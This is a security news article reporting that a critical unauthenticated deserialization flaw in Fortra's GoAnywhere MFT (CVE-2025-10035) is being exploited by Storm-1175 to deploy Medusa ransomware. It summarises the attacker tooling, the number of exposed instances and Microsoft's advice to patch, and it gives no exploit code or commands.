Microsoft GoAnywhere Bug Fuels Medusa Ransomware Attacks

A critical security flaw in Fortra’s GoAnywhere Managed File Transfer platform is currently fueling a wave of ransomware attacks, with Microsoft issuing an urgent alert for users to apply available patches immediately. The vulnerability, tracked as CVE-2025-10035, carries the maximum severity rating of 10.0 on the CVSS scale, indicating the highest level of risk. Microsoft’s security team detailed that this deserialization weakness in the License Servlet Admin Console permits attackers to forge license response signatures, bypassing verification checks entirely. This manipulation enables the deserialization of malicious objects crafted by the attacker, potentially leading to command injection and full remote code execution on the compromised system.

What makes this situation particularly alarming is that exploitation can occur without any authentication, provided the attacker can generate or intercept valid license responses. This characteristic renders internet-facing GoAnywhere instances exceptionally vulnerable. Once inside, threat actors can conduct comprehensive system and user reconnaissance, establish persistent access, and deploy additional tools to move laterally across the network while installing malware.

Although Fortra released a patch on September 18, the vulnerability had already been exploited as a zero-day a week earlier by the threat group Storm-1175. This group employed legitimate remote monitoring and management tools including SimpleHelp and MeshAgent to launch binaries, used network scanning utilities like netscan for discovery, and leveraged Microsoft’s Remote Desktop Connection client for lateral movement. For maintaining command and control, the actors configured RMM tools as their infrastructure backbone and established a Cloudflare tunnel to secure communications. During data exfiltration phases, security teams observed the deployment and execution of Rclone in at least one compromised environment, culminating in the successful installation of Medusa ransomware in one victim’s systems.

According to the Shadowserver Foundation’s internet scanning data, 513 GoAnywhere instances remain exposed online, with the majority, 363 systems, located in North America. This widespread exposure creates a significant attack surface for continued exploitation.

The Medusa ransomware operation, first identified in 2021, has accumulated over 300 victims globally, primarily targeting critical infrastructure sectors. A joint advisory from CISA, the FBI, and MS-ISAC noted that the ransomware-as-a-service variant has claimed more than 40 victims in just the first two months of 2025, including a confirmed attack against a United States healthcare organization. Affiliates distributing Medusa typically gain initial access through phishing campaigns or by exploiting unpatched software vulnerabilities, having previously leveraged flaws like the ScreenConnect authentication bypass (CVE-2024-1709) and the Fortinet EMS SQL injection vulnerability (CVE-2023-48788).

Microsoft has strongly recommended that all GoAnywhere customers immediately implement the available security patch, ensure their instances are not unnecessarily exposed to the internet, and maintain vigilant monitoring for any suspicious activity that might indicate compromise.

(Source: InfoSecurity Magazine)